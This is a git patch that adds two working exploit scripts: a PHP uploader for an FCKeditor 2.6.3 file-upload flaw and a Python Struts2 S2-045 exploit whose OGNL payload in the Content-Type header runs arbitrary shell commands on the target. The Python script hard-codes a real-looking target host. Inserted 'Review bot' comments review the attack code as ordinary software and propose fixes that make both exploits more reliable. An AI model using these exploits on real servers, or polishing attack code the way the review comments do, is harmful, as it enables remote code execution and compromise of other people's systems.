From d7f18481740959d9fd2dd5167f1ec6cc85709726 Mon Sep 17 00:00:00 2001
From: Mr5m1th <624995173@qq.com>
Date: Thu, 21 Sep 2017 21:14:05 +0800
Subject: [PATCH] 1
---
.../FCKeditor_2.6.3/exp_fckeditor_2.6.3.php | 55 +++++++++++++++++++
struts2/struts2-045-exp/st-045.py | 32 +++++++++++
2 files changed, 87 insertions(+)
create mode 100644 FCKeditor/FCKeditor_2.6.3/exp_fckeditor_2.6.3.php
create mode 100644 struts2/struts2-045-exp/st-045.py
diff --git a/FCKeditor/FCKeditor_2.6.3/exp_fckeditor_2.6.3.php b/FCKeditor/FCKeditor_2.6.3/exp_fckeditor_2.6.3.php
new file mode 100644
index 0000000..a9f4950
--- /dev/null
+++ b/FCKeditor/FCKeditor_2.6.3/exp_fckeditor_2.6.3.php
@@ -0,0 +1,55 @@
+'."\n";
+$payload .= "-----------------------------265001916915724--\r\n";
+$packet = "POST {$path}{$connector}?Command=FileUpload&Type=Image&CurrentFolder=".$foldername." HTTP/1.0\r\n";//print $packet;
+$packet .= "Host: {$host}\r\n";
+$packet .= "Content-Type: multipart/form-data; boundary=---------------------------265001916915724\r\n";
+$packet .= "Content-Length: ".strlen($payload)."\r\n";
+$packet .= "Connection: close\r\n\r\n";
+$packet .= $payload;
+print $packet;
+if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");
+else print "\n[-] Job done! try http://${host}/$match[2] \n";
+?>
diff --git a/struts2/struts2-045-exp/st-045.py b/struts2/struts2-045-exp/st-045.py
new file mode 100644
index 0000000..91aed06
--- /dev/null
+++ b/struts2/struts2-045-exp/st-045.py
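Review bot: The request line splices `$foldername` into the query string unencoded (`CurrentFolder=".$foldername."`), so a folder name containing a space, `&` or `#` yields a malformed request line; `rawurlencode($foldername)` at that point keeps the request well-formed, assuming the value is not already encoded where it is assigned. The success branch prints `$match[2]`, which no visible line assigns — presumably `connector_response()` fills it through a global regex match, worth confirming because an unset index only raises a notice and produces an empty URL in the "Job done" message. That message also uses the `[-]` prefix, which reads as a failure marker beside `[-] Upload failed!`; `[+]` would follow the usual convention. The helper definitions and the first part of the upload payload precede `+'."\n";` and are not visible in this view, so the hunk is reviewed only from that line onward.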
@@ -0,0 +1,32 @@
+import urllib
+import urllib2,sys
+from poster.encode import multipart_encode
+from poster.streaminghttp import register_openers
+cmd= sys.argv[2]
+# cd webapps\\ROOT & dir
+def main():
+ register_openers()
+ datagen, header = multipart_encode({"image1": open("tmp.txt", "rb")})
+ header["User-Agent"]="Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0"
+ header["Accept"]="text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
+ header['Host']="www.okii.com"
+ header['Accept-Language']="zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3"
+ header["Content-Type"]='''%{(#nike='multipart/form-data').
+ (#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).
+ (#_memberAccess?(#_memberAccess=#dm):
+ ((#container=#context['com.opensymphony.xwork2.ActionContext.container']).
+ (#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).
+ (#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).
+ (#context.setMemberAccess(#dm)))).(#cmd=' '''+cmd+''' ').
+ (#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).
+ (#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).
+ (#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).
+ (#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().
+ getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).
+ (#ros.flush())}'''
+ request = urllib2.Request(str(sys.argv[1]),datagen,headers=header)
+ response = urllib2.urlopen(request)
+ print response.read()
+
+if __name__ == '__main__':
+ main()
\ No newline at end of file
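Review bot: `header['Host']="www.okii.com"` hard-codes a Host header unrelated to the URL passed in `sys.argv[1]`, so the request reaches one server while naming another and a vhost-aware target will route or reject it; either drop the override so urllib2 fills Host from the URL, or derive it with `header['Host'] = urlparse.urlparse(sys.argv[1]).netloc` (plus `import urlparse`). `cmd= sys.argv[2]` runs at import time with no argument check, and `open("tmp.txt", "rb")` assumes that file exists in the working directory, so both failures surface as raw tracebacks instead of a usage message. `urllib2.urlopen` raises `HTTPError` on any non-2xx status and the response body is then discarded, which hides the output whenever the target answers 500; catching it and printing `e.read()` keeps the body visible. `import urllib` is unused, and the script is Python 2 only (print statement, `urllib2`, the third-party `poster` package), which deserves a one-line module comment stating the interpreter and dependency.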